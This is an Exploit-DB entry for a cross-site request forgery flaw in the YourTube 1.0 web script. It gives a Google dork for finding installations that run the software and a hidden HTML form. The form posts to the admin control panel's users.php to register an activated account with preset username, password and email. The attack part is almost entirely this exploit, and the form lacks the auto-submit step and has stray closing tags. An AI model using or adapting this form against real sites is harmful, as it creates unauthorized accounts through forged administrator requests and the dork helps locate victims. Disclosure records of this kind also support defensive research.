YourTube 1.0 - CSRF Vulnerability (Add User)



EDB-ID: 15892 CVE: N/A OSVDB-ID: N/A
Author: AtT4CKxT3rR0r1ST Published: 2011-01-02 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
YourTube v1.0 CSRF Vulnerability (Add User)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ac4p.com/
.:. Dork           : inurl:"Powered by YourTube v1.0"

####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/card/admincp/users.php">
<input type="hidden" name="action" value="Register"/>
<input type="hidden" name="vusername" value="user1"/>
<input type="hidden" name="vpass" value="123456"/>
<input type="hidden" name="email" value="user1@hotmail.com"/>
<input type="hidden" name="gender" value="m"/>
<input type="hidden" name="country" value="palestine"/>
<input type="hidden" name="altoge" value="My signature"/>
<input type="hidden" name="activated" value="1"/>
</form>

</body>
</html>

####################################################################